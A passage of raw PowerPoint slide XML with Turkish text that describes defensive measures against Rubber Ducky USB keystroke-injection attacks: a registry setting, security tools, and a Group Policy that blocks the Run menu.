            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yoluyla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>elde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>edilebilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Etkinleştirmek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>anahtarın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>değerine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sahip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olması</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gerekir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>anahtar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dosyaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aktarılabilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kuruluş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>içindeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>birkaç</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilgisayara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>otomatik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>uygulanabilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Özel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>araçların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanılması</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Piyasadaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>birçok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çözüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tür</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tehditleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>almayı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>vaat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ediyor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Çoğu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yalnızca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>güvenlikten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sorumlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>teknisyenler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tarafından</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dikkatli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>şekilde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yapılandırılırsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>işe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yarasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> da, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>davranış</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kalıplarını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>belirlemeye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çalışan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sistemler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hızlı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>şekilde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gelişiyor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tür</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tehditleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>belirlemede</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>etkili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olduklarını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kanıtlıyor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ilkeleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Rubber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Ducky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırısı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>klavye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kısayollarını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yürüt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>menüsünü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>açma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yeteneğini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>varsayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. Bir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>İlkesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Nesnesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> (GPO) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>menüye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>erişimi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yasaklamak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>uygulanabilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ilkesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>düzenleyicisinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>başlangıç</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>menüsünü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>düzenleyen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yönetim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>şablonlarında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bulunabilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Bilgi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>farkındalık</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
